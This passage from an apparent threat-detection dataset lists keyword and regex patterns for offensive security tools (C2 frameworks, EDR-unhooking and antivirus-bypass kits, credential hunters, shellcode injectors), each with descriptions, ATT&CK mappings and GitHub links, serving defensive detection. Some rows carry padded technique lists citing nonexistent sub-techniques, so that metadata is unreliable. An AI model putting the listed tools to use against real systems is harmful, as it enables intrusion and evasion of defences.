APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*UlBDIFNlcnZlciBIb3N0*",".{0,1000}UlBDIFNlcnZlciBIb3N0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UlBDIFNlcnZlciBQb3J0*",".{0,1000}UlBDIFNlcnZlciBQb3J0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Ullaakut/Gorsair*",".{0,1000}Ullaakut\/Gorsair.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*UltraSnaffCore.csproj*",".{0,1000}UltraSnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*",".{0,1000}UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT\-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*umutcamliyurt/PingRAT*",".{0,1000}umutcamliyurt\/PingRAT.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*",".{0,1000}UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgUGF0aA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgUGF0aA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgVVJJ*",".{0,1000}UmVmbGVjdGl2ZSBETEwgVVJJ.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*",".{0,1000}UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Un1k0d3r/SCShell*",".{0,1000}Un1k0d3r\/SCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*Unable to inject 64-bit shellcode from within 32-bit Powershell*",".{0,1000}Unable\sto\sinject\s64\-bit\sshellcode\sfrom\swithin\s32\-bit\sPowershell.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*uname=FUZZ&pass=FUZZ*",".{0,1000}uname\=FUZZ\&pass\=FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Unblock-File .\install.ps1*",".{0,1000}Unblock\-File\s\.\\install\.ps1.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*Unconstrained_Delegation_Systems.txt*",".{0,1000}Unconstrained_Delegation_Systems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Und3rf10w*",".{0,1000}Und3rf10w.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unDefender-master*",".{0,1000}unDefender\-master.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*undertheradar-main*",".{0,1000}undertheradar\-main.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*Unhandled Rubeus exception:*",".{0,1000}Unhandled\sRubeus\sexception\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*unhide-implant*",".{0,1000}unhide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*unhook kernel32*",".{0,1000}unhook\skernel32.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook wldp amsi*",".{0,1000}unhook\swldp\samsi.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook_ntdll(remote_process*",".{0,1000}unhook_ntdll\(remote_process.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*UnhookingKnownDlls.*",".{0,1000}UnhookingKnownDlls\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingNtdll_disk.*",".{0,1000}UnhookingNtdll_disk\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UniByAv*",".{0,1000}UniByAv.{0,1000}","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","N/A","N/A","N/A","N/A" "*unicorn.py *",".{0,1000}unicorn\.py\s.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*unicorn-master.zip*",".{0,1000}unicorn\-master\.zip.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - 